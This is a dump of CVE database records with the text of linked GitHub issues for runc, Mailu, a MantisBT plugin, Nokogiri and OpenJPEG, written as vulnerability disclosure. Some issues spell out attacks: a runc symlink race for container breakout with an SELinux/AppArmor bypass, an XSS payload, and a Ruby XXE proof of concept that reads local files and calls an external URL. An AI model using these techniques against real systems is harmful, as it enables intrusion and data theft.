[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00018.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0688" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0695" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/opencontainers/runc/issues/2197" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opencontainers/runc/pull/2190" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/opencontainers/runc/releases" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ANUGDBJ7NBUMSUFZUSKU3ZMQYZ2Z3STN/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FNB2UEDIIJCRQW4WJLZOPQJZXCVSXMLD/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security-tracker.debian.org/tracker/CVE-2019-19921" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202003-21" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4297-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00018.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0688" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0695" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/opencontainers/runc/issues/2197" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opencontainers/runc/pull/2190" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/opencontainers/runc/releases" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ANUGDBJ7NBUMSUFZUSKU3ZMQYZ2Z3STN/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FNB2UEDIIJCRQW4WJLZOPQJZXCVSXMLD/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security-tracker.debian.org/tracker/CVE-2019-19921" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202003-21" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4297-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linuxfoundation:runc:*:*:*:*:*:*:*:*", "matchCriteriaId": "D522E8C1-E7F0-4A3D-AF68-6D962944A0E5", "versionEndExcluding": null, "versionEndIncluding": "0.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "949172CC-EBB5-47F6-B987-207C802EED0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "F6D87B50-2849-4F4D-A0F9-4F7EBA3C2647", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "3E580E25-F94C-4DA4-8718-15D5F1C3ADAF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "FD565CE0-D9E9-4FD9-8998-8AC55030FAB7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "093326B1-448C-4E3B-886D-CAC8B6813BFF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "F672C421-789D-4F21-B483-DA3EB251BA1D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "E13C190A-D7CE-4204-8CEF-B7317D3FFBF9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc8:*:*:*:*:*:*", "matchCriteriaId": "15AEA3E2-A82F-4562-AFE6-B83A767B94E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc9:*:*:*:*:*:*", "matchCriteriaId": "EB5109FF-7C41-477E-B817-F63F06D866C3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "064E7BDD-4EF0-4A0D-A38D-8C75BAFEDCEF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.2:*:*:*:*:*:*:*", "matchCriteriaId": "4C85A84D-A70F-4B02-9E5D-CD9660ABF048", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "706" ]
706
https://github.com/opencontainers/runc/issues/2197
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "opencontainers", "runc" ]
Disclosed in https://github.com/opencontainers/runc/pull/2190. Here's the original report to security@opencontainers.org: Hi all, an attacker who controls the container image for two containers that share a volume can race volume mounts during container initialization, by adding a symlink to the rootfs that points to a directory on the volume. The second container won't be able to see the actual mount, but it can race it by modifying the mount point on the volume. This can be exploited for a full container breakout by racing readonly/mask mounts, allowing writes to dangerous paths like `/proc/sys/kernel/core_pattern`. Example: - The rootfs of container A has a symlink `/proc` -> `/evil/level1` - Container A specifies a named volume mounted to `/evil` - Container B, started before container A, shares this named volume and repeatedly swaps `/evil/level1` and `/evil/level1~` - Container A mounts procfs to `/evil/level1~/level2`, but when it remounts `/proc/sys`, it does so at `/evil/level1/level2/sys`. This can reliably be reproduced using runc and podman on Fedora 30 (takes about 0-5s to win the race for me): https://gist.github.com/leoluk/82965ad9df58247202aa0e1878439092 SELinux would ordinarily prevent the exploit by disallowing `container_t` from writing `usermodehelper_t`, but it can be disabled by symlinking `/proc/self/task/1/attr/exec` to something benign like `/proc/self/sched` (bypassing the procfs check). AppArmor can be disabled similarly. Docker specifies the mounts in a different order and mounts procfs after it mounts the volumes, mounting over the /proc symlink, which appears to prevent at least the /proc approach. I haven't tested other runc usage scenarios, for instance, k8s+cri-o might be vulnerable as well. Fabian of Cure53 (in CC) created a minimal PoC that uses runc directly: https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9 There are other container init steps after the volume mount that can be raced, obvious ones being utils.CloseExecFrom and the AppArmor/SELinux attrs but there might be others, especially in mountToRootfs (like tricking remount into mounting the rootfs as rshared if there's another volume that specifies the flag, but I haven't tried that). This is similar to the vulnerability I reported that Adam Iwaniuk disclosed during their Dragon Sector CTF (https://github.com/opencontainers/runc/issues/2128) and a similar crun one (https://github.com/containers/crun/issues/111). The fix for the mounts is probably what Aleksa outlined here, using /proc/self/fd to resolve the path: https://github.com/containers/crun/issues/111#issuecomment-536495867
[CVE-2019-19921]: Volume mount race condition with shared mounts
https://api.github.com/repos/opencontainers/runc/issues/2197/comments
12
2020-01-01T13:07:23Z
2023-04-24T11:30:03Z
https://github.com/opencontainers/runc/issues/2197
544,355,271
2,197
1,081
CVE-2020-5239
2020-02-13T01:15:11.047
In Mailu before version 1.7, an authenticated user can exploit a vulnerability in Mailu fetchmail script and gain full access to a Mailu instance. Mailu servers that have open registration or untrusted users are most impacted. The master and 1.7 branches are patched on our git repository. All Docker images published on docker.io/mailu for tags 1.5, 1.6, 1.7 and master are patched. For detailed instructions about patching and securing the server afterwards, see https://github.com/Mailu/Mailu/issues/1354
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 5.8, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Mailu/Mailu/issues/1354" }, { "source": "security-advisories@github.com", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/Mailu/Mailu/security/advisories/GHSA-2467-p5gv-58q6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Mailu/Mailu/issues/1354" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/Mailu/Mailu/security/advisories/GHSA-2467-p5gv-58q6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mailu:mailu:*:*:*:*:*:*:*:*", "matchCriteriaId": "5CD1E230-BB0F-4184-84B0-A67EAA9D97B0", "versionEndExcluding": "1.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/Mailu/Mailu/issues/1354
[ "Third Party Advisory" ]
github.com
[ "Mailu", "Mailu" ]
On 02/07, we discovered a bug in the Fetchmail script for Mailu that has serious security consequences. If you are using the fetchmail container for Mailu (which is optional), **please apply the following instructions as soon as possible**. The vulnerability requires authenticated access for exploitation, so patching is even more urgent if you have open registrations or untrusted users on your Mailu server. Feel free to ask any question or start any discussion on the following comment thread: #1355 Please spread the word and relay links to this issue to any channel you find appropriate. Special thanks to @sholl for finding the bug in the first place and @Nebukadneza for confirming the issue and preparing the fix. # Instructions 1. Before anything else, make sure that you can access your container logs, and create a backup if you are using the default logging driver, as update may overwrite these logs and make post-analysis more difficult. 2. Then apply one of the following mitigations. **A.** If running on 1.5, 1.6, 1.7 or master, update the fetchmail container : `docker-compose pull fetchmail; docker-compose up -d` (if you have automatic watchtower updates or equivalent, you should already be safe) **B.** If running on another version, upgrade at least to 1.5, if possible to 1.7 **C.** In case you need time before updating the container or upgrading Mailu, disable the fetchmail service : `docker-compose stop fetchmail` (then comment out the fetchmail section from the compose file to avoid any later mistake) **D.** If you need a few hours to think this over and you are exposed (open registrations or untrusted users), bring your Mailu stack down for the time being: `docker-compose stop` 3. Check that your setup is up to date by displaying the image identifier for your fetchmail container, then checking that the image was built after 02.07. 4. If you suspect any exploitation might have taken place, bring Mailu down, modify the `SECRET_KEY` with a new 16 bytes random value, then bring Mailu back up (this has the side effect of disconnecting most users). Change your password for every fetched account configured on your Mailu instance, or have users change them. 5. If you suspect any exploitation might have taken place, inspect your logs and database for any application tokens that might be illegitimate or recently modified accounts that could indicate an illegitimate password change (which could both be consequences of a successful exploit). Take action accordingly, and feel free to ask any question on the discussion thread. # Timeline 02/07/2020 : vulnerability reported and confirmed 02/07/2020 : patch published to branches 1.5 to master 02/08/2020 : advisory published # Details We will update this post in the next few days with details about the discovery, analysis and fix for this vulnerability. We will possibly request a CVE identifier for this, given the serious impact, so that visibility is maximum and Mailu administrators upgrade quickly. The current estimated CVSS is over 8. We will also provide plausible exploitation markers (additional to instructions in steps 4 and 5), although we did not find anything suspicious on any of three Mailu instances we manage that have open registration.
WARNING - Fetchmail security update to all branches, update ASAP
https://api.github.com/repos/Mailu/Mailu/issues/1354/comments
1
2020-02-08T09:30:20Z
2020-09-25T10:41:02Z
https://github.com/Mailu/Mailu/issues/1354
561,995,268
1,354
1,082
CVE-2020-8981
2020-02-13T17:15:29.930
A cross-site scripting (XSS) vulnerability was discovered in the Source Integration plugin before 1.6.2 and 2.x before 2.3.1 for MantisBT. The repo_delete.php Delete Repository page allows execution of arbitrary code via a repo name (if CSP settings permit it). This is related to CVE-2018-16362.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mantisbt-plugins/source-integration/commit/270675c964c675829fe010f9f0830521dc0835f0" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mantisbt-plugins/source-integration/issues/338" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mantisbt-plugins/source-integration/commit/270675c964c675829fe010f9f0830521dc0835f0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mantisbt-plugins/source-integration/issues/338" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mantisbt:source_integration:*:*:*:*:*:mantisbt:*:*", "matchCriteriaId": "8B60D2AF-47DF-4216-B941-DB4F41E31E5B", "versionEndExcluding": "1.6.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:mantisbt:source_integration:*:*:*:*:*:mantisbt:*:*", "matchCriteriaId": "0B46A26C-7FEA-485F-B8F4-9A0D26D07959", "versionEndExcluding": "2.3.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/mantisbt-plugins/source-integration/issues/338
[ "Third Party Advisory" ]
github.com
[ "mantisbt-plugins", "source-integration" ]
This is related to #286. Steps to reproduce: 1. Create a new repository, set repo name to `<script>alert('XSS');</script>` 2. Update and go back to Manage Repository page 3. Click on _Delete Repository_ CVE request 841560 pending.
CVE-2020-8981: XSS in Delete Repository page
https://api.github.com/repos/mantisbt-plugins/source-integration/issues/338/comments
1
2020-02-13T13:33:38Z
2020-02-13T23:33:47Z
https://github.com/mantisbt-plugins/source-integration/issues/338
564,685,646
338
1,083
CVE-2012-6685
2020-02-19T15:15:11.723
Nokogiri before 1.5.4 is vulnerable to XXE attacks
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1178970" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sparklemotion/nokogiri/issues/693" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://nokogiri.org/CHANGELOG.html#154-2012-06-12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1178970" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sparklemotion/nokogiri/issues/693" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://nokogiri.org/CHANGELOG.html#154-2012-06-12" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nokogiri:nokogiri:*:*:*:*:*:*:*:*", "matchCriteriaId": "CB203B5A-2979-4C08-8E90-EEA32EE5ACB0", "versionEndExcluding": "1.5.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:cloudforms_management_engine:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "7098B44F-56BF-42E3-8831-48D0A8E99EE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift:2.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "884F5BE8-59F5-4502-9765-F3A3E505570F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openstack:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "1802FDB8-C919-4D5E-A8AD-4C5B72525090", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openstack:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "31EC146C-A6F6-4C0D-AF87-685286262DAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openstack_foreman:-:*:*:*:*:*:*:*", "matchCriteriaId": "C77E4AD2-8BB5-427E-90BA-CB43B3684179", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:satellite:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "848C92A9-0677-442B-8D52-A448F2019903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:subscription_asset_manager:-:*:*:*:*:*:*:*", "matchCriteriaId": "B0E2C740-099C-427F-846D-951A2A1BF07E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_mrg:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C60FA8B1-1802-4522-A088-22171DCF7A93", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "776" ]
776
https://github.com/sparklemotion/nokogiri/issues/693
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sparklemotion", "nokogiri" ]
Using external xml entities you can specify URLs (e.g. HTTP) to be contacted when attacker-supplied XML is parsed. This can be used to trigger URLs on the internal network of a XML parsing service and potentially leak their responses. External xml entities should be completely (file, http, etc.) disabled. ``` $ cat test.rb require 'nokogiri' d=Nokogiri::XML.parse("<!DOCTYPE doc [ <!ENTITY ent SYSTEM \"file:///tmp/marker\"><!ENTITY ent2 SYSTEM \"http://www.google.com/marker\"> ]>\n<root>\n<element>&ent;</element>\n<element>&ent2;</element>\n</root>") d.each do |node| puts node.content end $ strace -e connect ruby test.rb # many connects, to www.google.com $ ruby --version ruby 1.8.7 (2010-01-10 patchlevel 249) [x86_64-linux] $ apt-cache show libnokogiri-ruby1.8 | grep Version Version: 1.4.0-3 $ apt-cache show libxml2 | grep Version Version: 2.7.6.dfsg-1ubuntu1.5 Version: 2.7.6.dfsg-1ubuntu1 $ apt-cache show libxml-ruby | grep Version Version: 1.1.3-2 ```
nokogiri vulnerable to XXE attack when used under c ruby
https://api.github.com/repos/sparklemotion/nokogiri/issues/693/comments
18
2012-06-06T09:34:24Z
2020-09-23T12:15:38Z
https://github.com/sparklemotion/nokogiri/issues/693
4,925,753
693
1,084
CVE-2016-3182
2020-02-20T01:15:10.687
The color_esycc_to_rgb function in bin/common/color.c in OpenJPEG before 2.1.1 allows attackers to cause a denial of service (memory corruption) via a crafted jpeg 2000 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
